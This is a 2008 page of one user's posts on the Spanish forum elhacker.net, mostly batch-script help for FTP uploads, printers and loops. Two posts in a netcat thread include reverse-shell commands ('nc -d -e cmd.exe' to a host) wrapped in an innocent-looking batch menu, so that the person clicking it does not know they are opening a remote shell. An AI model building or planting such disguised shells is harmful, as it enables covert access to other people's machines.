elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

Inicio Ayuda Ingresar Registrarse
11 Octubre 2008, 12:40  

Mostrar Mensajes
Páginas: [1] 2 3
1  Programación / Scripting / Verificador de archivos enviados a un ftp en: 05 Agosto 2008, 02:06
Hola a todos. Aqui les dejo un code sencillo que sube varios archivos a un servidor ftp. El detalle es que sube de uno por uno y verifica que el archivo este en el servidor. Pude haberlo hecho mas sencillo pero como el servidor maneja muchos archivos y a su vez varios usuarios, no es buena idea sacar un listado para luego compararlos.

El problema es que es demasiado lento debido a la forma que esta hecho, la lentitud no es problema cuando son 10 o 20 archivos, pero si cuando son 2000 o mas.  El punto es si alguen tiene una idea como hacerlo mas eficiente siguiendo la idea de veririficar que el archivo realmente este en servidor ftp. A su vez creo que puede servirle a alguien.

Código:
@echo off

:CONTANDO
set /A contador=0
FOR %%x in (*.HTML, *.GIF *.jpg, *.asp) DO set /A contador=1+contador
echo .
echo .                    ____________________________________________________
echo                      tienes %contador% archivos para subir
echo .                    ____________________________________________________
echo .
pause > nul

:ENVIA

set /A conta=0
set /A movidos=1

FOR %%x in (*.HTML, *.GIF *.jpg, *.asp) DO (
 echo open mi_sitio_ftp         >  manda.ftp
 echo user usuario pasword      >> manda.ftp
 echo put %%x                   >> manda.ftp
 echo ls %%x                    >> manda.ftp
 echo quit                      >> manda.ftp
 ftp -v -n -s:manda.ftp > enviados.txt
 FINDSTR /E /I %%x enviados.txt > en_ftp2.txt
 echo %%x > local.txt
 call :COMPARA
 )

:COMPARA
set /P aqui=<local.txt
set /p alla=<en_ftp2.txt
if %aqui%==%alla% (
set /A movidos=1+%movidos%
echo  %movidos%/%contador%   -- %alla%  Archivo enviado correctamente
) ELSE (
if not %aqui%==%alla% DO (

echo          %aqui%  NO SE HA PODIDO ENVIAR. REVISA SI NO HAY PROBLEMAS DE COMUNICACION
)
goto :eof
echo total de archivos enviados               %movidos%
echo total de archivos que deberian enviarse  %contador%

Un poco de explicacion

Código:
FOR %%x in (*.HTML, *.GIF *.jpg, *.asp) DO (
Bueno aqui no hay mucha ciencia puesto que solo hago un ciclo for para los archivos con extensiones mencionadas. Lo importante es que la variable es la x que va tomando el valor del nombre del archivo segun se va recorriendo la lista en el directorio y las veces que se repiten las instrucciones de abajo.

Código:
echo open mi_sitio_ftp         >  manda.ftp
 echo user usuario pasword      >> manda.ftp
 echo put %%x                   >> manda.ftp
 echo ls %%x                    >> manda.ftp
 echo quit                      >> manda.ftp

Puesto que segun yo no se pueden mandar variables a una conexion ftp, para cada archivo a subir creo un archivo de instrucciones ftp.

Código:
ftp -v -n -s:manda.ftp > enviados.txt
Aqui abro una conexion ftp para cada archivo y mando la salida del comando a un archivo de texto.

Código:
FINDSTR /E /I %%x enviados.txt > en_ftp2.txt
Busco el renglon donde esta el nombre del archivo en cuestion y a su ves lo mando a otro archivo, para tener en un archivo el nombre del documento que busco y que se supone esta en el servidor ftp.

Código:
echo %%x > local.txt
Mando el nombre del documento que el ciclo for esta intentando enviar en ese momento a un archivo temporal.

Código:
set /P aqui=<local.txt
set /p alla=<en_ftp2.txt
Pongo el nombre del archivo que quiero enviar en variables.

Código:
if %aqui%==%alla% (
set /A movidos=1+%movidos%
echo  %movidos%/%contador%   -- %alla%  Archivo enviado correctamente
) ELSE (
Hago una comparacion de los archivos. Si el que estoy tratando de enviar se encuentra en el servidor solo incremento un contador para poder comparar al final cuantos archivos tengo y cuantos se subieron realmente.

Bien como les dije es sencillo pero pude servirle a alguien y creo tambien que alguien tendra una idea para hacerlo mas eficiente.
2  Programación / Scripting / Re: Error al compilar un BAT a EXE en: 26 Julio 2008, 02:19

si aun se interesan en usar el QBC  Tengo entendido que las versiones 2x dan un problema de "SHIFT comand" la version 3.61 lo tiene arreglado. Pues ya lo comprobe, curiosamente hay un tipo que lo subio a internet sin saber nada de programacion pero tiene el .exe totalmente funcionable y sin necesidad de instalar
3  Programación / Scripting / Re: Detector unidades Pendrive 4.1 en: 26 Julio 2008, 02:11
Felicidades chicos quedo muy bien, sigan asi.
4  Seguridad Informática / Hacking Avanzado / Re: Paper: Obtener shell con Netcat en: 18 Junio 2008, 02:16
Bueno, es que cuando pongo 
nc -d -e cmd.exe %Host% %Puerto2%
msg * Conexion perdida.
goto:EOF

en un archivo.bat  el cliente no se conecta al servidor que esta a la escucha. Lo quiero saber si se puede es hacer poner las instrucciones en uno o varios .bat donde ya vengan las instrucciones de conectarse y cuando lo hagan manden x  comandos al servidor. Ejemplos

mata_messenger.bat
@echo off
rem voy a quitar el messenger a mi "victima"
nc -d -e cmd.exe ip.ip.ip.101 puerto
TSKILL messenger.exe
:EOF

CancelaImpresiones.bat
Código:
rem voy bajar el servicio de impresiones
nc -d -e cmd.exe ip.ip.ip.102 puerto
net stop "Print Spooler"

Menu.bat
Código:
@echo off
echo  ******************** MENU PRICIPAL **********************************
echo  *                                                                                   
echo  * [1] Quitar messenger a morenochico (que trabaje)                 
echo  * [2] Impedir que se use la impresora (queremos ahorrar papel)
echo  * [9] salir                                                                               
echo  *                                                                                                   
echo  **********************************************************************
echo     OPCION:
set /p opcion=
if %opcion% ==1 mata_messenger.bat
if %opcion% ==2 CancelaImpresiones.bat

Entonces estos tres .bat estaran en el cliente y quien de clic en menu.bat no va a saber que esta obteniendo una shell remota ni que esta usando netcat.

como ejemplo se puede hacer una conexion ftp que ejecute instrucciones que estan en un archivo ejemplo:
ftp.txt
Código:
open ip.ip.ip.103
user anonymous anonymous
cd Directorio
prompt
put *.DOC
quit

ftp.txt a su vez es usado en:
sube.bat
Código:
@echo off
echo voy a subir todos los documentos de word
ftp -v -n -s:ftp.txt
:eof

Entonces quiero hacer lo mismo pero para netcat
5  Seguridad Informática / Hacking Avanzado / Re: Paper: Obtener shell con Netcat en: 16 Junio 2008, 05:59
¿ Como iniciar y negociar conexiones de netcat desde un archivo?

Gracias a este manual pude obtener facilmente la shell remota, pero ahora lo que quiero es hacer un .bat que me invoque la conexion netcat y que ejecute ciertos procesos o instrucciones que esten en el bat.

Es mas cambie
Código:
nc -l -d -e cmd.exe -p 6000
por
Código:
nc -l -d -e MenuBienvenida.bat -p 6000
  y funciono pero  pongo el
Código:
nc -vv 192.168.1.4 6000
dentro de ConectateAlServidor.bat y no funciona. ¿como le hago para pasarle los parametros e instrucciones desde un archivo?  Pues lo que quiero es que una persona al dar clic al conectate.bat salga un menu y segun elija se conecta a un servidor diferente o hace instrucciones diferentes en el mismo servidor, ya que lo que quiero es que la persona no sepa que esta en una shell remota.  Lo que quiero decir es que la persona no va a teclear  instrucciones ni saber a donde esta accesando, para la persona solo va a hacer un menu y listo solo elige las opciones y ya.
6  Programación / Scripting / Re: configurar impresoras desde msdos o .bat en: 07 Mayo 2008, 17:43
voy a probarlo
7  Programación / Scripting / Re: problemas con set dentro de un for . en: 06 Mayo 2008, 16:42
Exelente, ya lo estoy implementando. Segun yo la clave esta en el
Código:
&&
ya que habia probado con un goto pero tampoco salia. Gracias. Pienso que este ejemplo deberia estar entre los tutos pues ayi no se encuentra ninguno parecido.
8  Programación / Scripting / problemas con set dentro de un for . en: 02 Mayo 2008, 17:38
¿Porque no  se imprime el valor del contador dentro del for? veo que si incrementa el contador y si se imprime al final pero me gustaria que se imprimiera dentro del for para contabilizar cada archivo.

Código:
set /A contador=0
FOR %%x in (*.php, *.jpg, *.html, *.tif) DO (
set /A contador=1+contador
echo el contador es:  %contador% el archivo es: %%x
 )
echo total: %contador%   

ya que la salida es:
el contador es:  0 el archivo es: fondo.jpg
el contador es:  0 el archivo es: index.html
el contador es:  0 el archivo es: inicio.php
total: 3

y cuando pongo  (que segun yo seria lo correcto)

Código:
set /A contador=1+%contador%

no se incrementa el contador
9  Programación / Scripting / Re: ¿Cambiar compatibilidad de programas desde msdos? ¿se puede? en: 02 Mayo 2008, 17:02
Pues queria saber de un comando o comandos que me ayuden a cambiar su compatibilidad (en lugar de dar click derecho etc). Pero me gusta la opcion que comentas voy a probarla y su funciona pues que bien me ahorraria la mitad del trabajo porque son muuuuuuchos archivos.
10  Programación / Scripting / ¿Cambiar compatibilidad de programas desde msdos? ¿se puede? en: 11 Abril 2008, 17:30
Quiero cambiar la compatibilidad de un programa desde msdos, ¿alguien sabe si se puede? a lo que me refiero es que cuando uno da clic derecho a un .exe o .bat y se va a propiedades existe una opcion que dice ejecutar con compatilidad a windows xs.  Tengo muchos archivos por cambiar y quiero hacerlo desde un bat pero no he hallado la forma.
11  Programación / Scripting / Re: [BATCH] Descargar archivo de ftp en: 08 Abril 2008, 08:04
Yo solo agregaria una cosa, en windows 2003 server no siempre da buenos resultados hacer:
echo usuario>ftp.txt
echo password>>ftp.txt

mas bien:

echo usuario password>>ftp.txt

O sea usuario y pas en una linea

Y si se va a descargar varios archivos pues seria cuestion de poner prompt antes de mget o sea quedaria asi:

echo prompt *.*>>ftp.txt
echo mget *.*>>ftp.txt

para que no nos pregunte si queremos descargar por cada archivo
12  Programación / Programación General / Re: ¿como puedo leer lo que teclea un cliente en telnet? en: 01 Abril 2008, 02:11
Esa es la idea a futuro solo que primero quiero dominar el tema telnet y que las aplicaciones cliente/servidor que he hecho no considero que esten suficientemente aptas para ello pues ya que quiero que al recibir una instruccion pueda ejecutar un programa o lanzar una aplicacion propia del sistema operativo. Pero seguire investigando.
13  Programación / Programación General / ¿como puedo leer lo que teclea un cliente en telnet? en: 28 Marzo 2008, 02:26
Buen dia:

¿como puedo ver las teclas que esta pulsando un cliente a un servidor telnet?
Pues lo que quiero es mandar señales por puerto serie de un servidor telnet. Algo asi como controlar un robot por internet. El robot estara conectado a una pc que sera el servidor telnet y desde una pc remota controlarlo por telnet. Lo que quiero esque cuando en el cliente pulse la tecla 6 se mueva a la derecha, 4 a la izquierda, 8 adelante y 2 atras.  Pero tambien quiero saber como estando en el servidor puedo ver lo que manda el cliente, que en ocasiones seran mensajes y no solo pulsar una tecla. He buscado pero no e encontrado algo especifico a lo que quiero aunque ya configure el archivo C:\WINDOWS\System32\login.cmd y tengo un menu pero ya no pude avanzar vi de el programa "readkey.exe" pero no lo pude descargar.

Pongo el tema en esta sección porque incluso me gustaria a futuro programar mi propio servidor telnet ya sea en java o C, y pues de entrada creo que involucra programar un poco en .bat por lo de el archivo login.cmd. Bueno al menos eso creo por lo que acepto sugerencias.
14  Programación / Scripting / Re: configurar impresoras desde msdos o .bat en: 24 Marzo 2008, 16:57
Pues si, basicamente busoc los comandos ya que quiero evitar el uso del wizard de windows para mayor rapidez y evitar errores u omitir un paso. Ya que el proposito es que pueda hacerlo una persona que no sepa mucho de pc's. Si alguen mas sabe se agradece su colaboracion.
15  Programación / Scripting / configurar impresoras desde msdos o .bat en: 21 Marzo 2008, 20:16
Buenas :

Mi pregunta se debe a que necesito configurar una impresora por puerto ip (en la opcion Standar TCP/IP port del wizard para instalar una impresora de windows).   Darle la ip y esoger el tipo de impresora (que es un modelo que ya esta instaldo) y compartir la impresora con un nombre especifico. ¿saben si existen comandos para ello?
Páginas: [1] 2 3

Consolas     La Web de Goku     MilW0rm     MundoDivx

Hispabyte     Truzone     TodoReviews     ZonaPhotoshop

hard-h2o modding    Foros de ayuda    Yashira.org    Videojuegos    indetectables.net   

Noticias Informatica    Seguridad Informática    ADSL    Foros en español    eNYe Sec

Todas las webs afiliadas están libres de publicidad engañosa.